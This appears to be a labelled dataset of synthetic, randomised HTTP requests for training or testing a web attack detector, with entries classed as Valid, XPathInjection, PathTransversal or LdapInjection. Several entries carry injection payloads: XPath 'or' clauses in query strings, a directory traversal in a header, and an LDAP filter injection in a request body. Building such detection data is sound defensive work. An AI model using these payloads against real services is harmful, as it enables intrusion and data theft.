Accept-Language: xh3fl-Earduf
Cache-Control: no-cache
Client-ip: 225.57.174.238
Cookie: 1z9nUGllesBlnts=aZAaCsvR4SbK;uce2eelmei=window.openD;c8=ihlT'86wgetbd4 asswsry;sqqYlikeWL6t1i=a;sntafyY63rMhw=ttue
Cookie2: $Version="158"
Date: Mon, 20 Jul 09 21:33:11 CET
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 100-continue
From: uaoalish@aer2rer6.org
If-Modified-Since: Thu, 14 May 09 22:58:51 CET
If-Unmodified-Since: Sat, 12 Feb 05 20:44:59 CET
If-Match: *
If-None-Match: "B.9SIudIMJGD9aWp.8d"
If-Range: *
Max-Forwards: 6736
Pragma: no-cache
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: 7ilWt neoUeF=c3Eyhe
Referer: /troe/trxe4.php3
TE: trailers
Trailer: Connection
User-Agent: Mozilla/8.0 (Windows; U; Win98 6.6; Ey-sr; rv:6.2.6) Gecko/50565689
UA-Color: color16
Via: FTP/8.0 www.yeawkaHs.shtml, 5.8 www.zIitmnNa.js
Transfer-Encoding: identity
Upgrade: BEt/7.6, h1sd/6.5, roeKws/7.5, meae/9.7, Tufb6/3.7
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39954
Start - Id: 1031
class: Valid
GET /t0_7KeBKsO/lrgFfFapXfD_M_J67-/hOwomKGBu9a/llroeis2xtxda/w7aiTsHtMDQNzvi.B9/sre1uLmFfqNoB/h2ZnR_uiN@iK_/aw/vav9CienUrraNaR9.asmx? HTTP/1.0
Host: www.nhdesieh.de
Connection: yeBhp4Dw
Accept: */*
Accept-Charset: windows-1251
Accept-Encoding: gzip;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 147.230.207.208
Cookie: caElaan7l=nhep
Cookie2: $Version="44"
Date: Thu, 27 Oct 05 22:54:55 UTC
ETag: "qlI5DcCR-hb8oGLncfIh"
Expect: mraoe
From: lSpom@es6vknOma.biz
If-Modified-Since: Sat, 28 Mar 09 03:50:42 GMT
If-Unmodified-Since: Wed, 30 Nov 05 06:08:05 UTC
If-Match: *
If-None-Match: *
If-Range: "qsGyYbjVRISMD2w"
Max-Forwards: 51
MIME-Version: 8.6
Pragma: ino=rdfy
Proxy-Authorization: id7l4l x1fuyra=sVlhNT
Authorization: Basic Zm5tZGRod2k6czNwZQ==
Range: 339-65412,180-85,-47
Referer: http://www.ipbg.fr/maesnelt/oaesiT/sttzets.cgi
TE: chunked,gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: 9HtaZwa4c (nCdEHL6XMK; 5QE-k_Vxa; tZ2Av.Gc)
UA-CPU: MIPS
UA-Disp: 108,3114,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5033x777
Via: HTTP/3.6 www.ozc48rci.htm:4052, 9.2 244.70.59.206, sssnl/5.2 195.85.182.201
Transfer-Encoding: deflate
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 976 www.rhtLT.css "c1yti6plTceoEa5eim0a" "Sat, 16 Jul 05 16:22:57 CET"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 3135796940
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1031
Start - Id: 34407
class: Valid
POST /q9E1Ir/vJNUhzNx1pF08zQ/frhineer/tsa7dtdAFdOfatd/peoauodim41n4hulnfa/iB0y/neatiynErjgs6R.exe? HTTP/1.1
Content-Length: 85
Content-Language: taes35
Content-Encoding: compress
Content-Location: http://Oedhmf.net/atbs/cbuxnao/renEe.asmx
Content-MD5: aXRlYW9iZXFFdGZpYWNpeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Jul 08 20:24:16 CET
Last-Modified: Sat, 10 Oct 09 18:22:36 CET
Host: 145.222.231.220
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate, gzip, gzip;q=0.0, deflate;q=0.4
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 245.163.168.164
Cookie: s7jnm=vj;xx1wW98Z=86
Cookie2: $Version="007"
Date: Sun, 26 Dec 04 24:13:28 GMT
ETag: W/"aerdtqIKkG9Ie3V6"
Expect: 2eeyntN
From: sguefot@nd3dact2t0.ch
If-Modified-Since: Tue, 18 Oct 05 03:50:47 CET
If-Unmodified-Since: Thu, 10 Jul 08 09:43:52 CET
If-Match: *
If-None-Match: "pj8.bFuakd4bbhBXl"
If-Range: *
Max-Forwards: 8188
MIME-Version: 8.4
Pragma: LC0e0t='nse'
Proxy-Authorization: NTLM NWd0dmF3b3Jmb0x0ZGliaXdtcG91bnNoZWxzaHJkbW9taGFkbjZnbXQ3dA==
Authorization: Basic ZWVEdHRkOmFoYmY=
Range: 1872-
Referer: /Eaeeota/woha/l3nFLjuh/qtN0.png
TE: chunked;q=0.0,chunked,gzip;q=0.6
Trailer: Warning
User-Agent: s6eiegieyl/8.4.9
UA-CPU: StrongARM
UA-Disp: 8099,2582,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 995x932
Via: FTP/6.4 157.192.70.148:0, FTP/5.6 www.blsinxo.jpg, 0.2 www.Ngssh.gif
Transfer-Encoding: deflate
Upgrade: uegc/4.0, wn9ad/1.0
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 0633130
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

rizpsob1b=9922&meetptdorT=naj=essr oss&srasaioictkv=oobject&zkeAItRerrbe=eszyehenoq

End - Id: 34407
Start - Id: 1820
class: Valid
GET /2ZY8iCm7usbIG%uj.jsp?ra5=cR9gc%7Eaosraoa&AoynnecYkj=6ydBRx6&m4hho=sBdjmn%3CNg&ror5nbis0tdse2=790671&GoUNCKC5cSg=23988&5wejdfpiinp9jd=eSnOpcteh&metaWRAi32=A&7bana0ciou9=%24%3Bc&cbzi6Ksu=%7Ers&kiniweoOolnlI=+ydiihtpassd6ohzsti%3E%7Ct&aftpfepu=5390&wTionlegn=libvbscriptlsz4e HTTP/1.1
Host: www.raFepm.gov
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, deflate
Accept-Language: hews-foomser;q=0.5, rsd-el3ec, cw-awe;q=0.6, s6lt-r;q=0.2, nrert-hsRw2h;q=0.7
Cache-Control: max-age=7823
Client-ip: 83.205.38.26
Cookie: dm=6709543989;ay7EiR9Tft=553;sf5hnli6nn=1eRnsrLde;tmt8=0243300651;atds=iilh;enehasW=fzV27-
Cookie2: $Version="547"
Date: Thu, 17 Jan 08 06:02:37 GMT
ETag: "j@CxBIw8ue7tt-v"
Expect: 100-continue
From: etiimsr@2ilc8.de
If-Modified-Since: Mon, 25 May 09 05:37:33 UTC
If-Unmodified-Since: Fri, 01 Dec 06 11:38:22 CET
If-Match: "bvgce79sUfOnFEPMk6N"
If-None-Match: *
If-Range: Sat, 20 Mar 04 16:04:08 CET
Max-Forwards: 9
MIME-Version: 6.1
Pragma: E=asaoael
Proxy-Authorization: NTLM Yzd0MGhYc25oaDhudDgwcmVhdGVublZld3VkYWFjbGlvZnQ=
Authorization: Basic ZW43czpldGhtbm1ucg==
Range: -1402,47341-
Referer: http://tienfhbs.ch/b0kd/dsYehaa/tnaE.cgi
TE: deflate,gzip;q=0.7,trailers
Trailer: Pragma
User-Agent: Mozilla/4.3 (compatible; MSIE 6.5; Unix; iadp; o6zSni)
UA-CPU: x86
UA-Disp: 0564,279,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 912x237
Via: sefftm/3.4 12.207.42.159:822
Transfer-Encoding: Ofucw
Upgrade: mntn/9.1, 8tme/6.2, rRoA/2.8, jle/4.8
Warning: 613 www.Hxowi.gif "ooxsXtuvN0ccdOg4eio" "Mon, 26 Apr 04 22:54:11 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 1820
Start - Id: 48928
class: XPathInjection
GET /see7wmsG0lipns/meta3fMD/iVd5nabMZaccess_logG/TNzhwullhY1o43r/BvbscriptNglocation-27UiA5hD/8pAi8Q8/holev19mrshuseay/ZVCKPrOMlt_/nhdeynxrettafsd/8hod6miroIitbaranr.nsf?bOdnmawscln=48940&dreef=waanna&nhdebn1i=NsrtuE%2Fh%2Frshitv%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D9%5D+%7C++++Haxsbt%2FaA%2Fhu%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D86%5D+++++or++++%27eoe%27+%3D+%27&_vw7nodeuNcL=ns&6LCQ7HlikeC_3=mT%3Bh&aprsIaittU=dotv8nnadhusa&t3hyc=window.openEjTynMo HTTP/1.1
Host: 76.146.176.197
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.1, x-mac-arabic
Accept-Encoding: *;q=0.2
Accept-Language: eE28d4Nl-aci, w-gt;q=0.5, s9Esutu-eco, srtd-A5c5cer;q=0.4, 3tlgyo-shhUan;q=0.4
Cache-Control: no-transform
Client-ip: 174.124.242.131
Cookie: Rrrwaeldnstt=8c;uoI=midsBi;vioee=t a;tyvhi=coS2;vUgK0=rhavingm3l]ldluyocat@-egroup byds
Cookie2: $Version="7"
Date: Tue, 11 Sep 07 11:59:08 UTC
ETag: W/"Rgf_hh80cxySShP0crvb"
Expect: 100-continue
From: Oetatc@0IatdnOywl.uk
If-Modified-Since: Tue, 25 Jan 05 05:11:28 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: "AtDXj-Bjn46i1RJyMG"
If-Range: Wed, 24 May 06 02:18:18 UTC
Max-Forwards: 2
MIME-Version: 7.0
Pragma: zdrXrci='sas6'
Proxy-Authorization: NTLM bmx2cmlpZmV0Ym1zdGg5b2xpYWRucmN2dGM4aTNlbm1lRVVoYg==
Authorization: a1piir ioAaEfh=ckslot
Range: 1264-
Referer: http://www.hOcg.st/mjasosae/dlitia/aecbeu.wmn
TE: gzip
Trailer: Host
User-Agent: 9socnsu/9.5.9.6.9
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: FTP/5.5 www.anernesA.css
Transfer-Encoding: dedro
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 4208976972
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48928
Start - Id: 23113
class: Valid
GET /l245V4cnPG@gIAImhunF/ZZqT2kLk4YH06I/tOaheybig/hHACNDvGX1VcwoRG.dll?smz=T&vrpcadf=er3u3Nehyreno&ttfsAduotc8ae1=i69bs%7C%3F+le1+H&ysrchyzbsc=%2Fdhtacces&VymCk=%7C5Fseeexmleh+oaOgqs&a6cnhqahnxde=nn0%26e&zLmygtesrrf=11207 HTTP/1.1
Host: www.hEhmdna1.ch
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: SAemS-etlhpeso, s-t9tTh0gl;q=0.8, elsA-SOeeet;q=0.1, ah-t;q=0.5
Cache-Control: no-cache
Client-ip: 64.33.164.229
Cookie: et=17557283;vKN4s-JI0=57546068;6oSeTurhflRit=7684019
Cookie2: $Version="52"
Date: Fri, 21 May 04 07:46:30 UTC
ETag: "qmWXf-epzJy1.Igr5Yw"
Expect: opts
From: Hocan@osthutarg1.biz
If-Modified-Since: Sat, 23 Jul 05 02:16:21 CET
If-Unmodified-Since: Sun, 09 Apr 06 01:11:33 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 678
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM NnQyamd6ZWM4VHNuSUFtcnRlZW5zRmNoaWlhYW90dGV1TnRyWGph
Authorization: Digest algorithm=oiHA
Range: 189-,863-
Referer: http://www.eooept7.org/ts7e5/mmd2Ase/oyr0rvg/nwctcefo/chhhtiti.gz
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: iE9El2h/5.9
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0764x660
Via: HTTP/6.5 61.244.69.120
Transfer-Encoding: deflate
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 73.70.52.35
X-Serial-Number: 026545042
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23113
Start - Id: 23133
class: Valid
GET /he/af5in0cs/ai96/nE0gEs.JXtjCCQl@Nz.htm?9yghtapn=bswosabdepetz&8riunliwsehn=oBii1z&s0kot=N0RaysnnwetmBnggn&HB7xOA=434&9u1tkl=sAis44_&qmtI=ornmog&uromhlpu=17&W1_etccDnodeLbYG=nheytlrEfcglsh&2betweenyW=ebp%40nehrtCerr8&j3hq0o4d=%25nxp_&enwe=7257908505&c458=cbtdete9rxEdith HTTP/1.1
Host: www.fcne.com:957
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, compress;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 114.241.46.240
Cookie: 8ecae=bJWtf2VD;eA=tc8sqeeEe1e;-6drop7lB82l7c.=nevX
Cookie2: $Version="20"
Date: Tue, 22 Feb 05 02:06:18 GMT
ETag: W/"v1AosA9JttpO2KcNU"
Expect: kseno7lE=dU2ds;5eOtlDeH
From: xtisieil@oihdn.cz
If-Modified-Since: Thu, 19 Jul 07 06:24:07 GMT
If-Unmodified-Since: Fri, 20 Feb 04 10:49:48 CET
If-Match: *
If-None-Match: "7@7i4jbJUVFfFu7"
If-Range: Tue, 19 Oct 04 20:36:14 UTC
Max-Forwards: 3
MIME-Version: 0.1
Pragma: nn9wfxtr='yhcl'
Proxy-Authorization: sreaa nzhdndbb=rDnD
Authorization: NTLM ZW43b2p5OGRvZ0FpY2V0MWRhaWF2dXlraG5sY1hyaHVueWwxaGlyaGFmbQ==
Range: -515103
Referer: /Raoo5u/0ioanEn.tar.gz
TE: trailers,trailers
Trailer: Referer
User-Agent: aSttfwsoe0aen
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 558x894
Via: 7.4 www.meovosti.tiff, 3.3 193.22.20.164, 5.2 www.do3r.jpg
Transfer-Encoding: deflate
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23133
Start - Id: 28476
class: Valid
GET /nIZ8tVA1_nx2r3pfrZWm.shtml?XmwmenIm=peeo+5r%28is&UP0A=cH4&ltzsraula=0&ol5etsn=rSsamAautoexecestiirrg+eeo+&oncikts=acrltegyfie&nnn=reqtnaii&Tmfifqemch0hu=rs0jeRcrrvLa0sor&en3stmwfrraayc=shtaccesd1&tnu4okassi2meju=%7CwAbi+E1t&LhUtn7orintvt0=68377&isa5elcA5rh=7686501 HTTP/1.1
Host: www.34ocsAhlce.fr:12331
Connection: 98ytee
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=8966
Client-ip: 122.199.110.148
Cookie: 1zascYlbAcmd=eeulsM2
Cookie2: $Version="5"
Date: Sat, 27 Nov 04 08:17:43 GMT
ETag: W/"4oMQV_ux-KoTLYo16"
Expect: 100-continue
From: zneku@9etnnTes8.it
If-Modified-Since: Wed, 24 Sep 08 01:29:01 CET
If-Unmodified-Since: Sat, 13 Mar 10 16:00:57 GMT
If-Match: "qiRYjB1M535LhuB"
If-None-Match: "R8dtEqeVgsDFay0rZi"
If-Range: Mon, 29 Aug 05 07:27:55 GMT
Max-Forwards: 6
MIME-Version: 1.7
Pragma: lh='IejTeibb'
Proxy-Authorization: oterIs cdpe=ll2ore
Authorization: NTLM ZWVzNmh0bjlYb2FldGhydW5oajNvaTV0ODZvaG82b2tjaXpvYW9v
Range: 51205-,399-
Referer: /pihraf.htm
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.6 (compatible; nSt7; Open BSD i386; ronmyle; sarf)
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 686x883
Via: 8.3 www.tohaspan.png:80136
Transfer-Encoding: identity
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 489 121.229.92.62 "gfasavwbhatyeEell" "Tue, 13 Apr 04 09:59:47 UTC"
X-Forwarded-For: 243.229.193.59
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28476
Start - Id: 35957
class: PathTransversal
GET /2xDO4K/anlrhectniwhl/9cobjectZuwDVk2NLFq1/i.GGIe1/tX.ApYpL3Cb9xkZDeX/lWNtoWdigav.png?ni=%40neefM&TohttpAJfDT=an&ohvajlNhIom=d%5DKh6hidaiu2es+&2em8ttdnetscdf=3264015&likePBv2=izici2xp_p+&ne=31&RfkL6s9@f=%7C+etct%24object1&wee1nfrr=aHz4X&wPunionKimgEH=nwrU6 HTTP/1.0
Host: 13.44.104.188
Connection: ahdngky
Accept: application/postscript;q=0.1, audio/x-wav, audio/x-wav
Accept-Charset: windows-1251, hz-gb-2312, iso-8859-15, x-mac-greek
Accept-Encoding: deflate, gzip;q=0.4
Accept-Language: /../../../../../../../Inetpub/iissamples/ra/negens/onseingena/veatndatis.cfm
Cache-Control: max-stale=8495
Client-ip: 45.228.255.238
Cookie: ahe9bsTihon4er=wLa;vetoo=no4;nc2zGxmlu=)l:e;4enA=u=
Cookie2: $Version="83"
Date: Mon, 23 May 05 17:59:57 GMT
ETag: "004MLFVpUtRTgtN5"
Expect: sonZogOs=ssleH
If-Modified-Since: Mon, 23 Nov 09 14:21:20 GMT
If-Unmodified-Since: Fri, 25 Aug 06 08:36:49 CET
If-Match: "h-@rY-5ac96kTzn"
If-Range: Tue, 18 Aug 09 09:50:47 GMT
Max-Forwards: 8
Proxy-Authorization: NTLM bWFyMW9yb2xodGFlMHR0b2VnbG5teGZ0YXNldW10eHBhbHJUdGVhaA==
Authorization: p8ttut oN20oals=eCro5ri
Referer: /olme.aspx
TE: deflate,chunked;q=0.6
User-Agent: Mozilla/7.1 (Machintosh; U; Mac OS X 4.9; 6n-ds; rv:4.3.8) Gecko/06739990
Via: 8.8 www.OnsTjbbo.jpg:40, stt0ne/5.2 www.19ykoh.png, 8.3 www.ilhztb.css
Transfer-Encoding: gzip
----: --------------------------------------------

null

End - Id: 35957
Start - Id: 29486
class: Valid
GET /jrjag4dsnt/iocltpSrn4/hqM/UI/JIB4V60@-jI.php3?iIeD_biClctmpu=%3Ctos%26&0owdete=9AmnG&Mf=isti4deIeour7&6jouTz=745591&oe7vgl3n2i3ceer=IPMsi%7EilrWed8lh&nlieo=inghysgrr&nuwmifah1yaba=rwcuahEmnhe5&qmtr=qstdinl&D@m6cpZlk13W=+e4ilehomo%7E%7CwP&yghUSehN=cDOd6mEJ8&QAzXN=e_%407h5te&01h2earOmeztY=e1MRrN&ima=snwthUst&5N27htaccesRq5W4or@=td4&n92ttz=76415469 HTTP/1.1
Host: 1.133.31.70
Connection: close
Accept: application/rtf, text/plain
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 73.184.178.164
Cookie: ataarM='a;hpfr6dgr7r3=9541036;ndhk=pst5;oa1pRogbEoaPtz=5
Cookie2: $Version="626"
Date: Sun, 04 Sep 05 14:39:07 CET
ETag: W/"e.9-Z97x5u2_n-Bwv"
Expect: et3hse
From: hnoyso@ioJaegaa.st
If-Modified-Since: Tue, 15 Jan 08 23:38:38 UTC
If-Unmodified-Since: Sun, 13 Apr 08 22:50:32 UTC
If-Match: *
If-None-Match: "1_0SXmsNiYLO_gaqmcKr"
If-Range: "qcL.gO8r1j-F-07_"
Max-Forwards: 83
MIME-Version: 4.0
Pragma: rnm=ot
Proxy-Authorization: Digest opaque="tidRaOc"
Authorization: NTLM aG1zdGl4bWR6d2hndHRsdHZ1cWlkaTBpam5mc2d0bEV0aGlodGNtYWV0cHg=
Range: 6551-
Referer: http://www.ynotonnu.ch/doycenv/vm9vlu/asbtg/epeQnou.tiff
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.7 (compatible; rjE8r; Mac OS X; tenos)
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 522x597
Via: FTP/3.0 127.45.237.75, q1e/5.2 www.e02mh.js
Transfer-Encoding: compress
Upgrade: nene/2.6
Warning: 266 www.rVtzt.html:16670 "6zule1aar5p" 
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29486
Start - Id: 22212
class: Valid
GET /errSuZnhy2N/vfJzi0hhds/gnarb/kIe7hi90afeunn/gez.php?ewnieunetrtA=os+%5Cbine&dni=sock_streameet&AtCCxp_I=aVusr&EgmlyLwt6cxxuta=4919&ido7=%25f&NErra=8334747 HTTP/1.1
Host: www.eSoeube.net
Connection: d4puu
Accept: image/jpeg;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.9, identity;q=0.6, compress, gzip
Accept-Language: n-c;q=0.9, dOs-lapy0u, i03dtI-ee, gos-d;q=0.4
Cache-Control: no-transform
Client-ip: 65.73.209.151
Cookie: fpdbt=replacecib;bgwA3P7kBp=i1odh;eytFojesbE=k%eot0y;Ra3hhaidetsjoi=ebIe/r;ldiwxdtzKSsoCdt=80
Cookie2: $Version="1"
Date: Wed, 21 Mar 07 04:36:02 UTC
ETag: W/"JVbXKO-H7teQCYptg"
Expect: 100-continue
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Thu, 04 Dec 08 08:52:19 CET
If-Unmodified-Since: Sat, 27 Jun 09 21:31:39 GMT
If-Match: *
If-None-Match: "SHMnr1XZ.OQdrZ_mh"
If-Range: "utJYPPeCgJDUW4ZQYJsb"
Max-Forwards: 2485
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bGNoYW46bzRPYUM=
Authorization: Basic aElycnJ0OmVydHU=
Range: -09
Referer: http://uhrnio.org/o6toeeep/lss4/t4poinr.asmx
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.7 (compatible; casd; Windows NT; id6t0; qv0liol; asWEh)
UA-CPU: Sparc
UA-Disp: 425,349,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x8565
Via: 2.0 www.ryRb.html
Transfer-Encoding: Qahe; m22n7ihn=hKnre
Upgrade: tmok/9.0, unq6a/6.8, to6le/2.7
Warning: 471 www.ihhsmu.html:12 "iviIgox" 
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22212
Start - Id: 37644
class: LdapInjection
PUT /sJ88lyn71/a6hb/Pc12N5b1TBXB7./ghpositionk/rwgKthMsdnmr/osjan/wAqsock_streamgroup bycv56cH6yLs.html? HTTP/1.0
Content-Length: 303
Content-Language: Haha5l,se
Content-Encoding: deflate
Content-Location: http://www.Ewol.org/geeInin9/wukvql/wdei/3Sdtbsp/emsavolr.htm
Content-MD5: ZXJkZzNzcm9pbG9uc29yMg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Aug 04 20:58:44 GMT
Last-Modified: Tue, 14 Nov 06 20:10:59 GMT
Host: 12.225.145.129:80
Connection: close
Accept: text/*;q=0.0, image/gif
Accept-Charset: cp-936;q=0.2, shift_jis;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 76.236.29.239
Cookie: sithittE6oc2t=i1;kdepodr=ibgsoundhttp5nina
Cookie2: $Version="67"
Date: Wed, 12 Mar 08 20:56:06 GMT
ETag: "UzfCajMja.i4X13-vZ"
Expect: nuie
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Mon, 07 Sep 09 03:51:46 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: "@l6I15syWjZBLMLi"
If-None-Match: *
If-Range: "ZTQa24puzQQdoUrESHV"
Max-Forwards: 03
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest algorithm=mRsj
Range: 7-75,773-,28-851
Referer: http://yeaTx4s.com/inoT/9eaq1ssa.rar
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.2 (X11; U; Linux i386 8.0; 8n-ed; rv:9.6.7) Gecko/34633704
UA-CPU: 68000
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: 2.4 148.42.66.185:98, toeaaf/0.4 185.202.185.251, r3s/5.9 www.2fz8Mzy.js:92812
Transfer-Encoding: deflate
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 189.116.98.106
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

Gtfesthsjyhje=sht3encd3&nubsE=4493)(&(objectClass=roa7)(|(sn    =   lqr)(cn=rbt J*))&aoAtTce=st1o9efrtaTexec droplji(&tlhhhetewgdh=557850151&qnpRane=hdcesehi&xSmetaaccess_logh=2438&P60WyO0=i-9HGC9BR&sodrq5=8460&eoirsc=4xV-Z.rr6i&htar=87&wlenIsstJeoo=aylmi&5bgvhuIocrOa=55

End - Id: 37644
Start - Id: 35863
class: XPathInjection
GET /5Owscript_QPS_rmo3/8iODUunionnEeKjlocation/ymme5bRioq/NscriptVLloVgsh/-1I/2ochclu/lwdy.jpeg?z3m=6686482&aIngrehs4tfpK=t+&alpr2tuhit1=715&1-KMdCY=7&utiauMeclmt5s0h=324159851&fhix=7&oft=Hqdt+t&rbJnJ0R4Ht=hMI3rHaV&knectekbiotuGss=6576&jwneryo=tf2%403%40fsP&eiroicic8t=ea%3DpnsWeab%28ass&enEiaa=eDh&aPelb0jqRuoahE=lltrrnuiAl&ctyws4mt3e7fdep=49mrdo%27%5D+%7C+++++P+++++%7C+%2F%2Fuser%5B++name%2Ftext%28+++%29+++%3D+++%27oc&oolror8asels=88488337 HTTP/1.1
Host: 168.143.20.212
Connection: close
Accept: audio/x-wav, image/*, text/*;q=0.9
Accept-Charset: koi8, windows-1254;q=0.1, iso-8859-8-i, x-mac-ce;q=0.7, x-mac-hebrew;q=0.6
Accept-Encoding: gzip
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 155.41.173.240
Cookie: cv52nptpo7hh=s-rsQXXVjKTv;moja9rhem=237;rRstEpirbtnone=P;erptahr=eNZJP;qoo=nSrlreepuEr
Cookie2: $Version="3"
Date: Tue, 21 Oct 08 03:45:48 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: nviar
From: alcSeiee@shniectns.be
If-Modified-Since: Fri, 04 Feb 05 15:44:47 UTC
If-Unmodified-Since: Fri, 02 Dec 05 07:10:01 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 09 Sep 08 04:20:52 UTC
Max-Forwards: 9312
MIME-Version: 1.5
Pragma: ry4rPld='ns'
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: NTLM ZWRoaHI2b3R0dWR6ZG5RdHRpZ25pYWV0ZWl1OGhzdERoTg==
Range: -15
Referer: /yuHyp.sh
TE: gzip;q=0.3
Trailer: Range
User-Agent: hSfjChoaBndietsnaer1
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0823x5331
Via: 7.1 www.vsirMnoE.png, 8.2 www.w11e.png
Transfer-Encoding: compress
Upgrade: ei2y/3.0
Warning: 278 124.130.70.150 "dewioT68Dmdytekib4" "Tue, 23 Nov 04 10:02:15 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35863
Start - Id: 2416
class: Valid
GET /nRSMnDBMTlJHl_wb/ocftpformB/Bacceptin/yYlslhidmoieasaz/2ee/msef2snkcnce5zc.bin? HTTP/1.0
Host: 87.227.52.182
Connection: phdoo
Accept: */*
Accept-Charset: iso-8859-15, ks_c_5601-1987;q=0.5
Accept-Encoding: identity;q=0.0, compress
Accept-Language: zc-kzoae9cl
Cache-Control: max-age=90649
Client-ip: 216.140.72.166
